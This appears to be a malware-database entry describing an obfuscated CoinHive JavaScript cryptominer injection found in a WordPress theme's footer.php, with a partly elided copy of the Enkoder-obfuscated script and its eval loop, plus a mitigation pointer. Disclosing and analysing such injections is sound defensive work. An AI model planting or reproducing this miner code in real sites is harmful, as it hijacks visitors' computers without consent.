Description:
One of many obfuscated CoinHive JavaScript miner injections, which usually means that it's used without webmaster's consent. This one uses the Hivelogic Enkoder for obfuscation.
< script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o="",l=x.length;for(i=0;i<l;i+=2) {if(i+1<l)o+=" + "x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f("ufcnitnof x({)av" + " r,i=o\"\"o,=l.xelgnhtl,o=;lhwli(e.xhcraoCedtAl(1/)3=!84{)rt{y+xx=l;=+;" + "lc}tahce({)}}of(r=i-l;1>i0=i;--{)+ox=c.ahAr(t)i};erutnro s.buts(r,0lo;)f}\" + ""(1),9\"\\\\V\\\\P\\KC3V02\\\\26\\04\\01\\\\26\\" + "00\\00\\\\21\\0N\\\\\\\\\\2100\\\\0/00\\\\.&05\\"+ ..skipped... "N9\\t4\\00\\\\O**421\\03\\02\\\\A900\\0%\\B636\\04\\"+ "-/00\\0\\\\\\\\Z\\31\\0>\\BP0L02\\\\27\\06\\01\\\"+ "\\\r&\\202203\\\\<t>.36\\0;\\<=21\\0q\\*'m kq,8.&e+\\6\" + "\\"4\\4503\\\\bQ`O05\\0N\\QIUE0F01\\\\n]lC21\\0Z\\E]IY" + "7Z00\\\\33\\00\\03\\\\07\\0x\\HP17\\0N\svy3smvqy~;v{q?" + ...skipped... "\\\27\\03\\02\\\\6M02\\\\17\\05\\00\\\\+23>\\?(\""+ "}fo;n uret}r);+)y+^(i)t(eAodrCha.c(xdeCoarChomfrg.intr=So+7;12%={y+)i+l;i<0" + ";i=r(foh;gten.l=x,l\"\\\"\\o=i,r va){,y(x fontincfu)\"")" ; while(x=eval(x)); //--> //]]> < /script>
We found this code at the bottom of the active WordPress theme's footer.php file.
Affecting: Mostly WordPress sites.
Mitigation How to clean a hacked WordPress site